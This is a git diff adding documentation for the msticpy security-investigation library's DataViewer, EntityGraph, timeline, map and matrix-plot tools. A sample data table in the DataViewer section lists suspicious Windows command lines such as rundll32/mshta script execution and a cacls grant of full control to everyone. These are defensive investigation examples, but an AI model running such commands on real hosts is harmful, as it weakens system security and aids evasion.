+  and non-string (numeric and dates)
+- *Expression* text box - type in the expression that you want to match
+
+.. figure:: _static/dataviewer_operator.png
+  :alt: Choose the column, operator and type in a expression to match.
+
+- **Add filter** button - adds the current filter items as a new filter
+  expression to **Current filters**
+- **Update filter** - overwrites the selected filter in **Current filters**
+  with the current filter expression.
+
+.. figure:: _static/dataviewer_add_filter.png
+  :alt: Add the filter expression to the Filters list or update an existing filter.
+
+Current filters
+^^^^^^^^^^^^^^^
+
+- Select the filter expression you want to operate on
+  from the **Filters** list
+- **Delete filter** deletes the selected item
+- **Clear all filters** removes all filter expressions
+- **Apply filter** - applies the filter items to the data and updates the display
+
+
+.. figure:: _static/dataviewer_apply_filter.png
+  :alt: Apply filter button filters the current view of the data.
+
+
+Advanced querying with filter **query** operator
+------------------------------------------------
+
+Selecting the **query** operator from the filter expression *operator* drop down
+lets you type in a pandas *query* expression.
+
+.. Note:: the selected column is not relevant for this operator since you
+   specify the column name within the query expression. You can select
+   any column name.
+
+See this documentation for the `syntax of the pandas *query*
+method <https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#the-query-method>`__
+
+
+Accessing the filtered data
+---------------------------
+
+Use the ``filtered_data`` property of the DataViewer to retrieve a
+DataFrame corresponding to the current column and row filtering.
+
+.. Note:: column sorting is not captured in this data.
+
+.. code:: ipython3
+
+   viewer.filtered_data
+
+
+==========================  ======================================================================  ===============  =========  ===================================  ===========================  ==========================
+Account                     CommandLine                                                             Computer           EventID  NewProcessName                       ParentProcessName            TimeGenerated
+==========================  ======================================================================  ===============  =========  ===================================  ===========================  ==========================
+MSTICAlertsWin1\MSTICAdmin  .\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)    MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\rundll32.exe  C:\Windows\System32\cmd.exe  2019-01-15 05:15:16.663000
+MSTICAlertsWin1\MSTICAdmin  cmd  /c C:\Windows\System32\mshta.exe vbscript:CreateObject("Wscript..  MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\cmd.exe       C:\Windows\System32\cmd.exe  2019-01-15 05:15:16.020000
+MSTICAlertsWin1\MSTICAdmin  .\wuauclt.exe  /C "c:\windows\softwaredistribution\cscript.exe"         MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\wuauclt.exe   C:\Windows\System32\cmd.exe  2019-01-15 05:15:18.080000
+MSTICAlertsWin1\MSTICAdmin  .\lsass.exe  /C "c:\windows\softwaredistribution\cscript.exe"           MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\lsass.exe     C:\Windows\System32\cmd.exe  2019-01-15 05:15:18.287000
+MSTICAlertsWin1\MSTICAdmin  cmd  /c "powershell wscript.shell used to download a .gif"              MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\cmd.exe       C:\Windows\System32\cmd.exe  2019-01-15 05:15:18.337000
+MSTICAlertsWin1\MSTICAdmin  cacls.exe  c:\windows\system32\wscript.exe /e /t /g everyone:f          MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\cacls.exe     C:\Windows\System32\cmd.exe  2019-01-15 05:15:18.403000
+MSTICAlertsWin1\MSTICAdmin  cmd  /c echo /e:vbscript.encode /b                                      MSTICAlertsWin1       4688  C:\Diagnostics\UserTmp\cmd.exe       C:\Windows\System32\cmd.exe  2019-01-15 05:15:18.820000
+==========================  ======================================================================  ===============  =========  ===================================  ===========================  ==========================
+
+|
+
+Exporting and importing the filters
+-----------------------------------
+
+You can export the current filter set as a dictionary:
+
+.. code:: ipython3
+
+   viewer.filters
+
+::
+
+   {"ParentProcessName contains 'cmd'": FilterExpr(column='ParentProcessName', inv=False, operator='contains', expr='cmd'),
+   "CommandLine contains 'script'": FilterExpr(column='CommandLine', inv=False, operator='contains', expr='script')}
+
+You can import an existing filter set like this:
+
+.. code:: ipython3
+
+    # manually add a filter
+    sample_filter = {
+        "ParentProcessName contains 'cmd'": ("ParentProcessName", False, "contains", "cmd"),
+        "CommandLine contains 'script'": ("CommandLine", False, "contains", "script"),
+    }
+    viewer.import_filters(sample_filter)
+
+The format of the filter dictionary is:
+
+.. code:: ipython3
+
+    {
+        "Filter name": Tuple({column_name}, {not}, {operator}, {expression}),
+        "Filter two": Tuple({column_name}, {not}, {operator}, {expression}),
+        ...
+    }
+
+You can also use the :py:class:`FilterExpr<msticpy.nbtools.data_viewer.FilterExpr>`
+named tuple to specify each filter condition:
+
+.. code:: ipython3
+
+    from msticpy.nbtools.data_viewer import FilterExpr
+    sample_filter = {
+        "ParentProcessName contains 'cmd'": FilterExpr(
+            column="ParentProcessName",
+            inv=False,
+            operator="contains",
+            expr="cmd"
+        ),
+        ...
+    }
diff --git a/docs/source/visualization/EntityGraph.rst b/docs/source/visualization/EntityGraph.rst
new file mode 100644
index 000000000..e12db63f3
--- /dev/null
+++ b/docs/source/visualization/EntityGraph.rst
@@ -0,0 +1,175 @@
+Entity Graph
+============
+
+This describes the use of the
+:py:class:`EntityGraph<msticpy.vis.entity_graph_tools.EntityGraph>`
+control.
+
+The purpose of this feature is to allow a user to create a graph of Incidents, Alerts, and other eneities during the course of an investigation.
+A graph can be initially created using any of the above entity options, with additional entities, and links between these entities added as an investigation progresses.
+As well as creating a graph object this feature allows for the plotting of the graph, allowing for interactive exploration of the entities and thier links.
+
+.. note: this feature provides similar funcitonality to `msticpy.nbtools.security_alert_graph`, however it is expanded to include support for additional entity types and incidents.
+    You can pass `EntityGraph` a SecurtyAlert in the same way you can with security_alert_graph and will produce a very similar graph.
+
+
+Creating a Graph from an Incident or Alert
+------------------------------------------
+
+Incidents and Alerts often have a set of assocaited entities (and other alerts), graphing these relationships is useful function and a common way to start the creation of a graph.
+`EntityGraph` can accept `Incident`, `Alert` and `SecurityAlert` entities and will extract each entity & assocaited alert in the entity, add them to the graph and create the connections between them.
+This is done by instantiating an EntityGraph object and passing in an incident, alert, or entity:
+
+.. code:: ipython3
+
+    from msticpy.datamodel.entities.soc.incident import Incident
+    incident = Incident(sample_inc)
+    graph = EntityGraph(incident)
+
+.. code:: ipython3
+
+    from msticpy.datamodel.entities.alert import Alert
+    alert = Alert(sample_alert)
+    graph = EntityGraph(alert)
+
+.. code:: ipython3
+
+    from msticpy.nbtools.security_alert import SecurityAlert
+    sec_alert = SecurityAlert(pd.Series(sample_alert))
+    graph = EntityGraph(alersec_alert)
+
+.. code:: ipython3
+
+    from msticpy.datamodel.entities.url import Url
+    url_ent = Url({"Url": "www.contoso.com"})
+    graph = EntityGraph(url_ent)
+
+
+Creating from a DataFrame
+^^^^^^^^^^^^^^^^^^^^^^^^^
+
+It is also possible to create graphs containing multiple alerts or incidents by passing a DataFrame containing incident or alert events to `EntityGraph` this will then convert these to the relevant entity type and plot them all on the one graph.
+
+.. code:: ipython3
+
+    df_graph = EntityGraph(df)
+
+There is also a Pandas accessor for this feature that allows for graph creation and plotting direct from a DataFrame with `df.mp_incident_graph.plot()`
+
+.. code:: ipython3
+
+    df_graph = mp_incident_graph.build()
+
+Plotting a Graph
+^^^^^^^^^^^^^^^^
+
+Once a graph has been created it can be visualized with the `plot` function.
+
+.. code:: ipython3
+
+    graph.plot()
+
+.. image:: _static/entitygraph.png
+  :width: 400
+  :alt: An entity graph
+
+Its also possible to visualize the graph. along with a timeline showing any timestamps attached to entities in the graph with `plot_with_timeline`.
+
+.. code:: ipython3
+
+    graph.plot_with_timeline()
+
+.. image:: _static/entitygraph_w_timeline.png
+  :width: 400
+  :alt: An entity graph with timeline
+
+It is also possible to plot directly from a dataframe with the Pandas accessor.
+
+.. code:: ipython3
+
+    df_graph = mp_incident_graph.plot()
+    df_graph = mp_incident_graph.plot_with_timeline()
+
+Adding & Removing Entities
+--------------------------
+
+During an investigation, you will want to expand or collapse the graph based on the outcomes of your investigations. The EntityGraph supports the ability to add and remove entities from the graph during the investigation.
+Entities that are added with the `add_entity` or `add_incident` functions, depending on whether the item being added is an incident or an entity. Added entities can be attached to another entity in the graph by specifying the name of the entity to attach to with the `attached_to` parameter.
+
+.. code:: ipython3
+
+    url_ent = Url(Url="www.contoso.com")
+    graph = EntityGraph(incident)
+    graph.add_entity(url_ent, attached_to="demo")
+    graph.plot()
+
+
+.. image:: _static/ent_graph_add.png
+  :width: 400
+  :alt: An entity graph with an added entity
+
+Removing a entity from the graph is done with `remove_node` function, with the name of the entity to remove passed with the `name` parameter:
+
+.. code:: ipython3
+
+    graph.remove_node("demo")
+    graph.plot()
+
+.. image:: _static/ent_graph_remove.png
+  :width: 400
+  :alt: An entity graph with an entity removed
+
+Adding & Removing Links
+-----------------------
+
+As well as adding entities to the graph you will also want to update the links between them as an investigation progresses. This can be done with the `add_link` and `remove_link` functions.
+
+.. code:: ipython3
+
+    graph.add_link("www.contoso.com", "Incident: Sample Incident")
+    graph.add_link("www.contoso.com", "CONTOSO\\auser")
+    graph.remove_link("CONTOSO\\auser", "Incident: Sample Incident")
+    graph.plot()
+
+.. image:: _static/ent_graph_link.png
+  :width: 400
+  :alt: An entity graph with links added and removed
+
+
+Adding Notes
+------------
+Entities are not the only elements that you might want to record as part of an investigation. To include a wide range of other items and observations the EntityGraph has the concept of Notes. Notes are nodes in the graph that have free form titles and descriptions, allowing the user to add anything they need - be it a comment on an entity on the graph, or a query used to find an event.
+Notes area added with the `add_note` function. As with the `add_entity` function notes can be attached to an existing entity in the graph.
+
+.. code:: ipython3
+
+    graph.add_note(name="This is a note",
+        description="Notes allow for free form additions to the graph",
+        attached_to="Incident: Sample Incident")
+    graph.plot()
+
+.. image:: _static/ent_graph_note.png
+  :width: 400
+  :alt: An entity graph with a note added
+
+
+Exporting Nodes to a DataFrame
+------------------------------
+
+As a graph has been built up during the course of the investigation you  may want to access or export some of the key elements of the graph. This can easily be done with the `to_df` function.
+
+.. note: he EntityGraph is built on NetworkX. If you want to access the networkx object of the graph it can be accessed with `alertentity_graph`.
+
+.. code:: ipython3
+
+    graph.to_df()
+
+    ====  =================================================  ============================================================================================  ===========  =============================  =======================  =======================
+      ..  Name                                               Description                                                                                   Type         TimeGenerated                  EndTime                  StartTime
+    ====  =================================================  ============================================================================================  ===========  =============================  =======================  =======================
+       0  Sample Incident                                    2021-09-22T15:09:09.2786667Z - Sample Incident - 123                                          incident     2021-09-22 15:09:09.278666700  2021-09-22T14:39:24.04Z  2021-09-22T14:39:24.04Z
+       1  User Added to Priviledged Group in CONTOSO Domain  User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']  alert        NaT
+       2  CONTOSO\auser                                                                                                                                    entity       NaT
+       3  www.contoso.com                                    www.contoso.com                                                                               entity       NaT
+       4  This is a note                                     Notes allow for free form additions to the graph                                              analystnote  2021-10-06 09:05:35.203699
+    ====  =================================================  ============================================================================================  ===========  =============================  =======================  =======================
\ No newline at end of file
diff --git a/docs/source/visualization/EventTimeline.rst b/docs/source/visualization/EventTimeline.rst
new file mode 100644
index 000000000..de2ad5ee9
--- /dev/null
+++ b/docs/source/visualization/EventTimeline.rst
@@ -0,0 +1,487 @@
+Event Timeline
+==============
+
+This document describes the use of the interactive timeline controls built
+using the `Bokeh library <https://bokeh.pydata.org>`__.
+
+There are two chart controls types:
+
+* Discrete event series - this plots multiple series of events as discrete
+  glyphs
+* Event value series - this plots a scalar value of the events using glyphs,
+  bars or traditional line graph (or some combination).
+
+A sample notebook demonstrating the use of these plot controls is
+available here `Event Timeline Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventTimeline.ipynb>`__
+
+
+
+
+Discrete Event Timelines
+------------------------
+
+Plotting a simple timeline
+^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+The display_timeline function (see
+:py:func:`display_timeline<msticpy.nbtools.timeline.display_timeline>`) takes three main
+parameters:
+
+* data - the data to plot. This can be either a pandas DataFrame or a
+  dictionary of data sets (see :ref:`plot_diff_data_sets` later.)
+* time_column - the name of the data column in the data to use as the
+  chart x axis.
+* source_columns - a list of column names used to populate the hovertool,
+  which shows the values of these columns as a tooltip, when you hover
+  over each point with a mouse.
+
+This code shows an example of creating a simple plot, with a single
+time series.
+
+.. code:: ipython3
+
+   from msticpy.nbtools.timeline import display_timeline
+
+   # load some data
+   processes_on_host = pd.read_csv(
+      "data/processes_on_host.csv",
+      parse_dates=["TimeGenerated"],
+      infer_datetime_format=True,
+      index_col=0
+   );
+
+   # At a minimum we need to pass a dataframe with timestamp column
+   # (defaults to TimeGenerated)
+   display_timeline(processes_on_host)
+
+
+.. figure:: _static/Timeline-01.png
+   :alt: Simple timeline chart
+
+
+The Bokeh graph is interactive and has the following features:
+
+**Tooltip** display for each event marker as you hover over it
+
+**Toolbar** with the following tools described in the order shown:
+
+* Panning
+* Select zoom
+* Mouse wheel zoom
+* Reset to default view
+* Save image to PNG
+* Hover tool
+
+Most of these are toggles, enabling or disabling the tool.
+
+Additionally an interactive timeline navigation bar is displayed below
+the main chart. You can change the timespan shown on the main chart by
+dragging or resizing the selected area on this navigation bar. You
+can also use the Bokeh panning and zoom tools directly on the main chart.
+
+.. note:: The tooltips work on the Windows process data shown above
+   because of a legacy fallback built into the code. Usually, you must
+   specify the ``source_columns`` parameter explicitly to have the hover
+   tooltips populated correctly.
+
+
+More Advanced Timelines
+^^^^^^^^^^^^^^^^^^^^^^^
+
+``display_timeline`` also takes a number of optional parameters that
+give you more flexibility to show multiple data series and change the
+way the graph appears.
+
+See :py:func:`display_timeline<msticpy.nbtools.timeline.display_timeline>` Documentation
+for a description of all of the parameters.
+
+
+
+
+Grouping Series From a Single DataFrame
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+.. code:: ipython3
+
+   display_timeline(
+      processes_on_host,
+      group_by="Account",
+      source_columns=["NewProcessName", "ParentProcessName"],
+      legend="inline"
+   );
+
+
+.. figure:: _static/Timeline-02.png
+   :alt: Grouped timeline chart
+
+
+We can use the ``group_by`` parameter to specify a column on which to split
+individually plotted series.
+
+Specifying a legend, we can see the value of each series group. The
+legend is interactive - click on a series name to hide/show the data.
+The legend can also be placed outside of the graph specifying 'left' or
+'right'.
+
+Specifying a legend, we can see the value of each series group.
+The legend is interactive - click on a series name to
+hide/show the data. The legend can be placed inside of the chart
+(``legend="inline"``) or to the left or right.
+
+
+
+.. note:: the trailing semicolon just prevents Jupyter showing the return
+   value from the function. It isn’t mandatory.
+
+
+Alternatively we can enable the ``yaxis`` - although this is not guaranteed
+to show all values of the groups.
+
+.. code:: ipython3
+
+   display_timeline(
+      processes_on_host,
+      group_by="Account",
+      source_columns=["NewProcessName", "ParentProcessName"],
+      yaxis=True
+   );
+
+.. figure:: _static/Timeline-03.png
+   :alt: Grouped timeline chart with yaxis
+
+
+Plotting directly from a DataFrame
+----------------------------------
+
+We’ve implemented the timeline plotting functions as pandas accessors so
+you can plot directly from the DataFrame using ``mp_timeline.plot()``.
+
+All of the parameters used in the standalone function are available in
+the pandas accessor functions.
+
+.. note: you still need to import ``msticpy.nbtools.timeline`` to
+   activate this.
+
+.. code:: ipython3
+
+   # load some data
+   host_logons = pd.read_csv(
+      "data/host_logons.csv",
+      parse_dates=["TimeGenerated"],
+      infer_datetime_format=True,
+      index_col=0,
+   )
+
+
+   host_logons.mp_timeline.plot(
+      title="Logons by Account name",
+      group_by="Account",
+      source_columns=["Account", "TargetLogonId", "LogonType"],
+      legend="left",
+      height=200,
+   )
+
+
+   host_logons.mp_timeline.plot(
+      title="Logons by logon type",
+      group_by="LogonType",
+      source_columns=["Account", "TargetLogonId", "LogonType"],
+      legend="left",
+      height=200,
+      range_tool=False,
+      ygrid=True,
+   );
+
+
+.. figure:: _static/Timeline-04.png
+   :alt: Two charts with grouped timelines
+
+
+
+Displaying Reference lines
+--------------------------
+
+You can annotate your timeline with one or more reference markers. These
+can be supplied as timestamped events in a DataFrame or a list of
+datetime/label pairs.
+
+To use a DataFrame, pass this as the ``ref_events``:
+
+-  You can specify the column to use as a label with the ``ref_col``
+   parameter
+-  If the time_column is not the same name as the time column in the
+   main DataFrame, specify this as ``ref_time_col``
+
+To use a list of times, use the ``ref_times`` parameter. This should be
+a list of tuples of
+
+-  datetime
+-  label (string)
+
+E.g. ``ref_times=[(date1, "item1"), (date2, "item2")...]``
+
+You can use either ``ref_events`` or ``ref_times`` with a single row or
+list entry.
+
+.. code:: ipython3
+
+    # pull out a sample row to use as a reference marker
+    alerts = processes_on_host.sample(3)
+
+    display_timeline(
+        host_logons,
+        title="Processes with marker",
+        group_by="Account",
+        source_columns=["Account", "TargetLogonId", "LogonType"],
+        ref_events=alerts,
+        ref_col="SubjectUserName",
+        legend="left",
+        ygrid=True,
+    );
+
+.. figure:: _static/Timeline_markers-02.png
+   :alt: Timeline with multiple reference markers
+
+For a single reference point you can also use ``alert``, ``ref_event``
+or ``ref_time`` although these are now deprecated in favor of
+``ref_events`` and ``ref_times``.
+
+Use ``ref_event`` (note: this is different from ``ref_events``)
+
+.. figure:: _static/Timeline-05.png
+   :alt: Timeline with reference marker
+
+
+.. _plot_diff_data_sets:
+
+Plotting series from different data sets
+----------------------------------------
+
+When you want to plot data sets with different schema on the same plot
+it is difficult to put them in a single DataFrame. To do this we need to
+assemble the different data sets into a dictionary and pass that to the
+``display_timeline``
+
+The dictionary has this format::
+
+    Key (str) - Name of data set to be displayed in legend
+    Value (Dict[str, Any]) - containing:
+        data (pd.DataFrame) - Data to plot
+        time_column (str, optional) - Name of the timestamp column
+        source_columns (list[str], optional) - source columns to use
+            in tooltips
+        color (str, optional) - color of datapoints for this data
+    If any of the last values are omitted, they default to the values
+    supplied as parameters to the function (see below)
+
+
+This example shows creating this dictionary. Notice that ``source_columns``
+parameter for each series is different. The source column set used is the
+union of all of the individual sets so some items will display "???" If
+the source data does not have a column corresponding to one or more of the
+names.
+
+.. code:: ipython3
+
+   procs_and_logons = {
+      "Processes" : {
+         "data": processes_on_host,
+         "source_columns": ["NewProcessName", "Account"]
+      },
+      "Logons": {
+         "data": host_logons,
+         "source_columns": ["Account", "TargetLogonId", "LogonType"]
+      }
+   }
+
+   nbdisplay.display_timeline(
+      data=procs_and_logons,
+      title="Logons and Processes",
+      legend="left"
+   );
+
+
+.. figure:: _static/Timeline-06.png
+   :alt: Timeline with a dictionary of data series.
+
+
+Plotting Series with Scalar Values
+----------------------------------
+
+Often you may want to see a scalar value plotted with the series.
+
+The example below uses ``display_timeline_values`` to plot network flow
+data using the total flows recorded between a pair of IP addresses.
+
+Note that the majority of parameters are the same as
+``display_timeline`` but include a mandatory ``y`` parameter which
+indicates which value you want to plot on the y (vertical) axis.
+
+See :py:func:`display_timeline_values<msticpy.nbtools.timeline.display_timeline_values>` documentation
+for a description of all of the parameters.
+
+
+.. code:: ipython3
+
+   az_net_flows_df = pd.read_csv(
+      'data/az_net_flows.csv',
+      parse_dates=["TimeGenerated", "FlowStartTime", "FlowEndTime"],
+      infer_datetime_format=True,
+      index_col=0,
+   )
+
+   flow_plot = nbdisplay.display_timeline_values(
+      data=az_net_flows_df,
+      group_by="L7Protocol",
+      source_columns=[
+         "FlowType",
+         "AllExtIPs",
+         "L7Protocol",
+         "FlowDirection",
+         "TotalAllowedFlows"
+      ],
+      time_column="FlowStartTime",
+      y="TotalAllowedFlows",
+      legend="right",
+      height=500
+   );
+
+
+.. figure:: _static/Timeline-07.png
+   :alt: Timeline values plot.
+
+
+By default the plot uses vertical bars show the values but you can use
+any combination of 'vbar', 'circle' and 'line', using the ``kind`` parameter.
+You specify the plot types as a list of strings (all lowercase).
+
+
+Including “circle” in the plot kinds makes it easier to see
+the hover value.
+
+
+.. code:: ipython3
+
+    flow_plot = nbdisplay.display_timeline_values(
+      data=az_net_flows_df,
+      group_by="L7Protocol",
+      source_columns=[
+         "FlowType",
+         "AllExtIPs",
+         "L7Protocol",
+         "FlowDirection",
+         "TotalAllowedFlows"
+      ],
+      time_column="FlowStartTime",
+      y="TotalAllowedFlows",
+      legend="right",
+      height=500,
+      kind=["vbar", "circle"]
+   );
+
+
+
+
+.. figure:: _static/Timeline-08.png
+   :alt: Timeline values plot with circles.
+
+
+The line plot can be a bit misleading since it will
+plot lines between adjacent data points of the same series, implying that
+there is a gradual change in the value being plotted - even though there
+may be no data between the times of these adjacent points. For this
+reason using vbar is often a more accurate view. Compare the following
+two plots.
+
+
+.. figure:: _static/Timeline-09.png
+   :alt: Comparing line and vbar plots.
+
+
+Timeline Durations
+------------------
+
+Sometimes it’s useful to be able to group data and see the start and
+ending activity over a period. The timeline durations plot gives you
+that option. It creates bands for the start and ending duration of each
+group, as well as the locations of the individual events.
+
+Note, that unlike other timeline controls you *must* specify a
+``group_by`` parameter. This defines the way that the data is grouped
+before calculating the start and end of the events within that group.
+``group_by`` can be a single column or a list of columns.
+
+Durations are shown using boxes with individual events superimposed (as
+diamonds).
+
+.. code:: ipython3
+
+   from msticpy.nbtools.timeline_duration import display_timeline_duration
+
+   display_timeline_duration(
+      host_logons,
+      group_by="Account",
+      ref_events=host_logons.sample(3),
+      ref_col="TargetUserName",
+   );
+
+.. figure:: _static/Timeline_duration-01.png
+   :alt: Timeline duration showing bands for start and end of event groups.
+
+.. code:: ipython3
+
+   az_net_flows_df.mp_timeline.plot_duration(
+       group_by=["SrcIP", "DestIP", "L7Protocol"]
+   )
+
+.. figure:: _static/Timeline_duration-02.png
+   :alt: Timeline duration for IP addresses showing bands for
+      start and end of event groups.
+
+Exporting Plots as PNGs
+-----------------------
+
+To use ``bokeh.io`` image export functions you need selenium, phantomjs and
+pillow installed:
+
+``conda install -c bokeh selenium phantomjs pillow``
+
+or
+
+``pip install selenium pillow``
+
+``npm install -g phantomjs-prebuilt``
+
+For phantomjs downloads see `phantomjs.org <https://phantomjs.org/download.html>`__.
+
+Once the prerequisites are installed you can create a plot and save the
+return value to a variable. Then export the plot using ``export_png``
+function.
+
+.. code:: python
+
+   from bokeh.io import export_png
+   from IPython.display import display, Image, Markdown
+
+   # Create a plot
+   flow_plot = nbdisplay.display_timeline_values(data=az_net_flows_df,
+                                                 group_by="L7Protocol",
+                                                 source_columns=["FlowType",
+                                                                 "AllExtIPs",
+                                                                 "L7Protocol",
+                                                                 "FlowDirection",
+                                                                 "TotalAllowedFlows"],
+                                                 time_column="FlowStartTime",
+                                                 y="TotalAllowedFlows",
+                                                 legend="right",
+                                                 height=500,
+                                                 kind=["vbar", "circle"]
+                                               );
+
+   # Export
+   file_name = "plot.png"
+   export_png(flow_plot, filename=file_name)
+
+   # Read it and show it
+   display(Markdown(f"## Here is our saved plot: {file_name}"))
+   Image(filename=file_name)
diff --git a/docs/source/visualization/FoliumMap.rst b/docs/source/visualization/FoliumMap.rst
new file mode 100644
index 000000000..b9c83ac2a
--- /dev/null
+++ b/docs/source/visualization/FoliumMap.rst
@@ -0,0 +1,112 @@
+Folium Map Plotting
+===================
+
+The :py:class:`FoliumMap<msticpy.nbtools.foliummap.FoliumMap>`
+class is a light wrapper around the Folium geo-mapping interactive
+mapping package.
+See `Folium <https://python-visualization.github.io/folium/>`_.
+
+Folium is itself built on the leaflet.js library.
+
+The msticpy ``FoliumMap`` class expects
+:py:class:`IpAddress<msticpy.nbtools.entityschema.IpAddress>`
+entities as input.
+Each entity must have a valid ``Location`` property populated with
+a :py:class:`GeoLocation<msticpy.nbtools.entityschema.GeoLocation>`
+object containing the Latitude, Longitude and, optionally, other
+attributes.
+
+The GeoIP Lookup module classes return IpAddress entities populated
+with this data so can be used seemlessly with the ``FoliumMap`` class.
+
+
+Display a GeoIP Map
+-------------------
+
+Assuming that you have a set of IpAddress objects with location
+data populated, you can plot the addresses as follows:
+
+
+.. code:: ipython3
+
+    from msticpy.nbtools.foliummap import FoliumMap
+    folium_map = FoliumMap()
+
+    # Set Icon properties to display
+    icon_props = {"color": "green"}
+
+    # Set additional properties to display in tooltips
+    # in AdditionalData property of IpAddress entities
+    for ips in host_entity.public_ips:
+        ips.AdditionalData["host"] = host_entity.HostName
+    # Add the IP set to the map
+    folium_map.add_ip_cluster(ip_entities=host_entity.public_ips, **icon_props)
+
+    # display the map (or just have folium_map as the last statement
+    # of the cell - Jupyter will use display() automatically)
+    display(folium_map)
+
+
+.. figure:: _static/FoliumMap-01.png
+   :alt: Folium interactive map
+   :width: 5in
+   :height: 4in
+
+
+Converting IP Address Strings to IpAddress entities
+---------------------------------------------------
+
+This example uses an function to create
+:py:class:`IpAddress<msticpy.nbtools.entityschema.IpAddress>` entities
+from IP string or ipaddress objects stored in a pandas DataFrame.
+
+The ``format_ip_entity`` function converts the IP string value to
+an IpAddress object, looks up the geolocation (this data is populated
+into the IpAddress ``Location`` attribute). It also adds additional
+information from the pandas DataFrame into the AdditionalData attribute.
+Values populated here will be displayed in the tooltip for each plotted
+IP Address on the map.
+
+.. note:: The values populated into the AdditionalData attribute are
+   specific to this example. AdditionalData is a dictionary object
+   so you can put data keyed with a string name here. Primitive value types
+   such as string, numbers, dates, etc. should display correctly.
+
+
+.. code:: ipython3
+
+    # Create a IP Geolookup class
+    iplocation = GeoLiteLookup()
+
+    def format_ip_entity(row, ip_col):
+        ip_entity = entities.IpAddress(Address=row[ip_col])
+        iplocation.lookup_ip(ip_entity=ip_entity)
+        ip_entity.AdditionalData["protocol"] = row.L7Protocol
+        if "severity" in row:
+            ip_entity.AdditionalData["threat severity"] = row["severity"]
+        if "Details" in row:
+            ip_entity.AdditionalData["threat details"] = row["Details"]
+        return ip_entity
+
+    ips_out = list(selected_out.apply(lambda x: format_ip_entity(x, "dest"), axis=1))
+    ips_in = list(selected_in.apply(lambda x: format_ip_entity(x, "source"), axis=1))
+    ips_threats = list(ti_ip_results.apply(lambda x: format_ip_entity(x, "Ioc"), axis=1))
+
+    icon_props = {"color": "green"}
+    for ips in host_entity.public_ips:
+        ips.AdditionalData["host"] = host_entity.HostName
+    folium_map.add_ip_cluster(ip_entities=host_entity.public_ips, **icon_props)
+    icon_props = {"color": "blue"}
+    folium_map.add_ip_cluster(ip_entities=ips_out, **icon_props)
+    icon_props = {"color": "purple"}
+    folium_map.add_ip_cluster(ip_entities=ips_in, **icon_props)
+    icon_props = {"color": "red"}
+    folium_map.add_ip_cluster(ip_entities=ips_threats, **icon_props)
+
+    display(folium_map)
+
+
+See also
+--------
+
+:doc:`../data_acquisition/GeoIPLookups`
\ No newline at end of file
diff --git a/docs/source/visualization/MatrixPlot.rst b/docs/source/visualization/MatrixPlot.rst
new file mode 100644
index 000000000..85c17bd34
--- /dev/null
+++ b/docs/source/visualization/MatrixPlot.rst
@@ -0,0 +1,271 @@
+Matrix Plot
+===========
+
+The matrix plot is designed to show interactions between two sets of items
+(columns in a pandas DataFrame) in a x-y grid.
+
+For example, if you have a DataFrame with source and destination
+IP addresses (such as a firewall log), you can plot the source IPs
+on the y axis and destination IPs on the x axis. Where there is an event
+(row) that links a given source and destination the matrix plot will
+plot a circle.
+
+.. figure:: _static/Matrix_plot_value_inv.png
+    :figwidth: 50%
+    :alt: Plot of interactions between source and destination IP addresses.
+        The size of each interaction is inversely proportional to the value of
+        the TotalAllowedFlows column. This highlights rare interactions.
+
+By default the circle is proportional to the number of events containing
+a given source/destination (x and y).
+
+The matrix plot also has the following variations:
+
+- You can use a named column from the input data (e.g. bytes transmitted)
+  to control the size of the plotted circle.
+- You can invert the circle plot size, so that
+  rarer interactions are shown with a large intersection point.
+- You can plot just the presence of one or more interactions - this plots a
+  fixed-size point and is useful if you only want to see the presence/
+  absence of an interaction but don’t care about the number of
+  interactions.
+- You can use a count of distinct values to control the
+  size (e.g. you might specify *protocol* as the value column and want to
+  see how many distinct protocols the source/destination interacted over).
+- You can plot the log of any of the above counts/size - this is useful
+  if the variance in the size is orders of magnitude.
+
+
+
+Sample data
+-----------
+
+A look at the top 3 rows of our sample data.
+
+.. code:: ipython3
+
+    net_df.head(3)
+
+
+=============  ============  ===================  ===============
+SourceIP       L7Protocol      TotalAllowedFlows  DestinationIP
+=============  ============  ===================  ===============
+20.38.98.100   https                           1  65.55.44.109
+13.67.143.117  https                           1  13.71.172.130
+65.55.163.76   https                           5  13.65.107.32
+=============  ============  ===================  ===============
+
+The basic matrix/interaction plot
+---------------------------------
+
+The basic matrix plot displays a circle at each interaction between the X and Y
+axes items. The size of the circle is proportional to the number of
+records/rows in which the X and Y parameter interact.
+
+Here we are using MSTICPy pandas accessor to plot the graph directly
+from the DataFrame.
+See :py:meth:`mp_plot.matrix<msticpy.vis.mp_pandas_plot.matrix>`
+
+.. code:: ipython3
+
+    net_df.mp_plot.matrix(x="SourceIP", y="DestinationIP", title="IP Interaction")
+
+.. figure:: _static/Matrix_plot_basic.png
+    :alt: Plot of simple count of interactions between source and destination IP
+        addresses
+
+
+.. tip:: **Using the Bokeh interactive tools**
+
+    The Bokeh graph is interactive. The toolbar lets you toggle the
+    interactive tools: Panning, Select zoom, Mouse wheel zoom, Reset to default view, Save image to PNG, Hover tool.
+
+    If the Hover tool is enabled a tooltip will display some properties
+    of the intersecting point as you hover the mouse over that point.
+
+
+Sorting the X and Y values
+--------------------------
+
+You can use the ``sort`` parameter to sort both axes or ``sort_x`` and
+``sort_y`` to individually sort the values.
+
+The sort parameters take values "asc" (ascending), "desc" (descending),
+``True`` (ascending). ``None`` and ``False`` produce no sorting.
+
+.. note:: Bokeh automatically sorts the X axis labels in
+   ascending order. You can override this with sort_x="desc" but it is not
+   possible to display the x axis in unsorted (DataFrame) order.
+
+
+.. code:: ipython3
+
+    net_df.mp_plot.matrix(
+        x="SourceIP",
+        y="DestinationIP",
+        title="IP Interaction",
+        sort="asc"
+    )
+
+.. figure:: _static/Matrix_plot_sorted.png
+    :alt: Plot of simple count of interactions between source and destination IP
+        addresses, showing sorted values on both axes.
+
+
+Using the ``plot_matrix`` function directly
+-------------------------------------------
+
